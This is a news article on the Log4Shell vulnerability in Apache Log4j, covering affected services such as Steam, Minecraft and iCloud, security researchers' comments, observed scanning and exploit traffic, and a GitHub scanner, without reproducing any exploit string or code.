Worldwide Log4j Attacks That Can Deploy Malware Affect Steam, Minecraft, and iCloud

  • A previously unknown vulnerability called Log4Shell is being patched across large and small companies.
  • Millions of applications use Log4j, and this zero-day allows an attacker remode code execution and malware deployment.
  • At the moment, Mincraft, Steam, and iCloud have been confirmed vulnerable.

Security teams at large and small companies are patching a previously unknown vulnerability, which was publicly released early Friday morning and could allow hackers to take over millions of devices on the internet. Log4Shell is a zero-day vulnerability in Apache Log4j's Java-based logging platform that lets an attacker remotely change their browsers' user agent to a particular string to execute a command on a vulnerable server and also deploy malware.

There are thousands of apps and services that use the Log4j open-source logging library. Since there is a logging process for nearly every network security system, Log4j is popular. Despite the Log4j 2.15.0 update, threat actors already managed to exfiltrate data, install malware, or take over the vulnerable servers.

Security Researcher Marcus Hutchins said on Twitter that millions of applications use Log4j and that an attacker has to get them to log a special string. Steam, Minecraft, and iCloud are confirmed to be susceptible to remote code execution (RCE) at the moment.

Amazon, Apple, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and video games such as Minecraft use Log4j as a logging package. For example, attackers have used specially crafted messages pasted into the Minecraft chat box to gain remote code execution access.

Bharat Jogi, senior manager of vulnerabilities and signatures at Qualys, said that the Apache Log4j zero-day vulnerability is probably of high severity, probably the most critical one Qualys has seen this year.

The GreyNoise reported numerous internet search engines looking for vulnerable machines. Cloudflare reported monitoring 20,000 exploit requests per minute at 6:00 PM UTC on Friday, most of which originated in Canada, the US, Netherlands, France, and the UK.

Due to the range of delivery mechanisms and the diversity of applications vulnerable to exploits, there are still risks involved. The exploit can be carried out physically rather than directly over the internet by hiding the attack string in a QR code scanned by a package delivery company. Log4Shell remains a threat until all vulnerable machines are updated.

There is a fully automated and extensive scanner available on GitHub for finding log4j RCE (CVE-2021-44228), which is ideal for companies to scan their infrastructure and also test for WAF bypasses.

Latest
How to Watch Interior Design Masters Season 4 Online from Anywhere
Fans of this reality show, which offers ambitious designers a chance to demonstrate their abilities and pursue their dreams of becoming professional...
How to Watch Rock The Block Season 4 Online: Stream the Renovation Series from Anywhere
Rock the Block, the smash hit home remodeling contest series, is back for its most fantastic season ever! The new six-episode season...
How to Watch Spring Baking Championship Season 9 Online: Stream the Cooking Competition from Anywhere
There’s no better way to welcome spring with some freshly baked goods, and that’s precisely how we’ll usher in the good weather...
For a better user experience we recommend using a more modern browser. We support the latest version of the following browsers: For a better user experience we recommend using the latest version of the following browsers: Chrome, Edge, Firefox, Safari